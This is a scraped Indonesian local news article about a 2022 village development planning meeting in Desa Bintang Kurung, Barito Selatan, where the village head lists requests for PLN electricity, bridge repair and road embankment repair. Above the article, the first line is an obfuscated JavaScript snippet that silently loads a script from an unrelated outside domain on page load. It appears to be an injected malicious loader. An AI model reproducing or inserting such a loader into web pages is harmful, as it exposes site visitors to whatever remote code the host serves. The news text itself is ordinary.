(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Selatan

Musrenbangdes di Desa Bintang Kurung, Kades: Listrik PLN Masuk dan Siring Jalan Diperbaiki


KANALKALIMANTAN.COM, BUNTOK – Musyawarah Rencana Pembangunan Desa (Musrenbangdes) tahun 2022 di Kabupaten Barsel telah selesai dilaksanakan, ditutup pada kunjungan terakhir ke Desa Bintang Kurung, Kecamatan Karau Kuala, Jumat (18/2/2022).

Kades Bintang Kurung Suriansyah mengatakan, ada tujuh usulan masyarakat desa yang disampaikan dalam Musrenbangdes bersama pemerintah daerah, serta perwakilan anggota legislatif. Di mana dari ketujuh usulan ini, tiga diantaranya sangat menjadi impian warga sejak lama.

“Impian warga yang kiranya bisa terwujud di tahun 2022 2023 ini yaitu penerangan listrik PLN, pembangunan perbaikan kembali jembatan Sura Panji dan perbaikan siring jalan desa. Besar harapan kita usulan itu kiranya 100% terakomodir,” kata Suriansyah kepada Kanalkalimantan.com, usai kegiatan.

Lebih lanjut olehnya untuk siring jalan desa terbilang sudah tidak layak, mengingat siring yang dibuat dari kayu tersebut merupakan bangunan tahun 2002 silam, dan tentunya sekarang sudah banyak yang lapuk serta hampir tak mampu menahan badan jalan.

 

Baca juga : RUU Provinsi Disetujui, Banjarbaru Jadi Ibu Kota Kalimantan Selatan

“Oleh itu kita sangat berharap sekali kiranya usulan yang sudah kita impikan sejak dulu dan kembali kita usulkan kembali di Musrenbangdes tahun ini dapat terealisasi paling tidak tahun 2023,” ujar Suriansyah.

Di tempat yang sama, Asisten III Setda Barsel, Mirwansyah mengatakan, Pemkab Barsel terus berusaha agar setiap usulan yang disampaikan masyarakat bisa dilaksanakan.

Mengenai beberapa usulan yang jadi skala prioritas Desa Bintang Kurung dirinyapun berharap dapat terakomodir dengan baik di tahun 2023 nanti.

“Tentunya semua usulan terus kita sampaikan, dan yang mana usulan prioritas tentu kita pula sangat berharap dapat terealisasi,” tuturnya.

 

Baca juga : Forum Perangkat Daerah Mulai Bahas Ranwal Renja 2023

Ditambahkan Kepala Dinas Sosial Pemberdayaan Masyarakat dan Desa (DSPMD) Barsel, Selviriyatmi, usulan-usulan skala prioritas dari desa akan terus dikawal hingga ke tingkat kecamatan dan juga kabupaten. Hal itu juga didukung oleh anggota Dewan Perwakilan Rakyat Daerah (DPRD) setempat yang mengikuti jalannya kegiatan Musrenbangdes.

“Kita sudah berkomitmen untuk mengawal setiap usulan prioritas desa bersama tim anggaran dan OPD terkait, dari banyaknya usulan itu harus ada yang terealisasi dan jangan sampai gagal paling tidak usulan yang lebih prioritas,” tandas Selvi.(kanalkalimantan.com/digdo)

Reporter : digdo
Editor : bie


Desy Arfianty

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

3 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

15 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

16 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

16 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

17 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

18 jam ago

This website uses cookies.